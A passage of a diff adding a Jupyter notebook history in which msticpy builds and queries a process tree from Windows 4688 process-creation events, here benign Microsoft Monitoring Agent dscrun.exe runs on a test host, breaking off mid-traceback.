+        "text/html": "<div>\n<style scoped>\n    .dataframe tbody tr th:only-of-type {\n        vertical-align: middle;\n    }\n\n    .dataframe tbody tr th {\n        vertical-align: top;\n    }\n\n    .dataframe thead th {\n        text-align: right;\n    }\n</style>\n<table border=\"1\" class=\"dataframe\">\n  <thead>\n    <tr style=\"text-align: right;\">\n      <th></th>\n      <th>TenantId</th>\n      <th>Account</th>\n      <th>EventID</th>\n      <th>TimeGenerated</th>\n      <th>Computer</th>\n      <th>SubjectUserSid</th>\n      <th>SubjectUserName</th>\n      <th>SubjectDomainName</th>\n      <th>SubjectLogonId</th>\n      <th>NewProcessId</th>\n      <th>...</th>\n      <th>source_index_par</th>\n      <th>ProcessId_par</th>\n      <th>NewProcessName_par</th>\n      <th>TimeGenerated_orig_par</th>\n      <th>parent_key</th>\n      <th>IsRoot</th>\n      <th>IsLeaf</th>\n      <th>IsBranch</th>\n      <th>path</th>\n      <th>parent_index</th>\n    </tr>\n    <tr>\n      <th>proc_key</th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n    </tr>\n  </thead>\n  <tbody>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xcd82019-02-09 20:52:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 20:52:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xcd8</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/8</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x8dc2019-02-09 21:02:56.257000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 21:02:56.257</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x8dc</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/10</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xbd02019-02-09 21:32:56.270000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 21:32:56.270</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xbd0</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/15</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xe342019-02-09 22:02:56.263000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:02:56.263</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xe34</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/67</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x53c2019-02-09 22:32:56.247000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:32:56.247</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x53c</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/76</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xef42019-02-09 22:32:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:32:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xef4</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/78</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xd742019-02-09 23:22:56.257000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 23:22:56.257</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xd74</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/107</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x6f82019-02-09 23:32:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 23:32:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x6f8</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/120</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x1fc02019-02-10 00:02:56.257000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:02:56.257</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x1fc0</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/127</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x10bc2019-02-10 00:12:56.253000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:12:56.253</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x10bc</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/129</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xb482019-02-10 00:32:56.270000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:32:56.270</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xb48</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/139</td>\n      <td>1004</td>\n    </tr>\n  </tbody>\n</table>\n<p>11 rows × 35 columns</p>\n</div>",
+        "text/plain": "                                                                                TenantId  \\\nproc_key                                                                                   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n\n                                                                       Account  \\\nproc_key                                                                         \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \n\n                                                    EventID  \\\nproc_key                                                      \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \n\n                                                             TimeGenerated  \\\nproc_key                                                                     \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 20:52:56.260   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:02:56.257   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:32:56.270   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:02:56.263   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.247   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.260   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:22:56.257   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:32:56.260   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:02:56.257   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:12:56.253   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:32:56.270   \n\n                                                           Computer  \\\nproc_key                                                              \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \n\n                                                   SubjectUserSid  \\\nproc_key                                                            \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \n\n                                                     SubjectUserName  \\\nproc_key                                                               \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \n\n                                                   SubjectDomainName  \\\nproc_key                                                               \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \n\n                                                   SubjectLogonId  \\\nproc_key                                                            \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \n\n                                                   NewProcessId  ...  \\\nproc_key                                                         ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xcd8  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0x8dc  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xbd0  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xe34  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0x53c  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xef4  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xd74  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0x6f8  ...   \nc:\\program files\\microsoft monitoring agent\\age...       0x1fc0  ...   \nc:\\program files\\microsoft monitoring agent\\age...       0x10bc  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xb48  ...   \n\n                                                   source_index_par  \\\nproc_key                                                              \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \n\n                                                   ProcessId_par  \\\nproc_key                                                           \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \n\n                                                   NewProcessName_par  \\\nproc_key                                                                \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \n\n                                                   TimeGenerated_orig_par  \\\nproc_key                                                                    \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \n\n                                                                                           parent_key  \\\nproc_key                                                                                                \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \n\n                                                   IsRoot IsLeaf IsBranch  \\\nproc_key                                                                    \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \n\n                                                        path parent_index  \nproc_key                                                                   \nc:\\program files\\microsoft monitoring agent\\age...    1004/8         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/10         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/15         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/67         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/76         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/78         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/107         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/120         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/127         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/129         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/139         1004  \n\n[11 rows x 35 columns]"
+       },
+       "execution_count": 70,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c",
+     "text": "parent = ptutil.get_parent(p_tree, children2.iloc[0])\nproc = ptutil.get_process(p_tree, children2.iloc[0])\nsiblings = ptutil.get_children(p_tree, parent, include_source=False)\nsiblings[siblings.index != proc.name]\n#     if not include_source:\n#         return siblings.loc[~proc]\n#     return siblings"
+    },
+    "executionTime": "2019-12-13T21:13:48.155Z"
+   },
+   {
+    "cell": {
+     "executionCount": 1,
+     "executionEventId": "6aa53b32-e975-456d-bb18-ffb7e43d2bfd",
+     "hasError": false,
+     "id": "49c5edc4-ca62-4d42-85e3-578a4b9c1872",
+     "outputs": [],
+     "persistentId": "7b5a3079-d2e1-481d-a076-8eaa96f1c430",
+     "text": "import pandas as pd\nimport numpy as np\nprocs = pd.read_pickle(\"../demos/data/processes_on_host.pkl\")"
+    },
+    "executionTime": "2019-12-13T21:16:59.090Z"
+   },
+   {
+    "cell": {
+     "executionCount": 2,
+     "executionEventId": "053b9496-9cca-4406-9b43-32a21f338744",
+     "hasError": false,
+     "id": "8fa864ac-34d2-492c-a5f3-8de85bce1ed3",
+     "outputs": [],
+     "persistentId": "23f15d93-9749-4e85-a4ca-a112e158bf76",
+     "text": "testdf = procs.iloc[:1000]\npd.to_pickle(testdf, \"../demos/data/win_proc_test.pkl\")"
+    },
+    "executionTime": "2019-12-13T21:16:59.137Z"
+   },
+   {
+    "cell": {
+     "executionCount": 3,
+     "executionEventId": "9afbc31d-1042-4856-8fa9-3fc9bdc8a92a",
+     "hasError": false,
+     "id": "70acc446-d177-488d-a4e5-153697303b3a",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "\nThis product includes GeoLite2 data created by MaxMind, available from\n<a href=\"https://www.maxmind.com\">https://www.maxmind.com</a>.\n",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "text/html": "\nThis library uses services provided by ipstack.\n<a href=\"https://ipstack.com\">https://ipstack.com</a>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "name": "stdout",
+       "output_type": "stream",
+       "text": "Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank\n"
+      },
+      {
+       "data": {
+        "application/vnd.jupyter.widget-view+json": {
+         "model_id": "57016d5c03534233a066b16a7fdbc181",
+         "version_major": 2,
+         "version_minor": 0
+        },
+        "text/plain": "HBox(children=(IntProgress(value=0, bar_style='info', description='Progress:'), Label(value='0%')))"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "name": "stdout",
+       "output_type": "stream",
+       "text": "{'Processes': 1010, 'RootProcesses': 10, 'LeafProcesses': 815, 'BranchProcesses': 185, 'IsolatedProcesses': 0, 'LargestTreeDepth': 7}\n"
+      }
+     ],
+     "persistentId": "175c1262-ad6d-485c-999b-459cae210ad6",
+     "text": "import msticpy.sectools.process_tree_utils as ptutil\nimport msticpy.nbtools.process_tree as ptplot\n\np_tree = ptutil.build_process_tree(testdf, show_progress=True)"
+    },
+    "executionTime": "2019-12-13T21:17:02.778Z"
+   },
+   {
+    "cell": {
+     "executionCount": 4,
+     "executionEventId": "ea92c38b-ac05-44b6-96ca-28ff27ba698f",
+     "hasError": true,
+     "id": "5610ff3a-83b0-4253-92bb-feba160df533",
+     "outputs": [
+      {
+       "ename": "NameError",
+       "evalue": "name 's_tree' is not defined",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mNameError\u001b[0m                                 Traceback (most recent call last)",
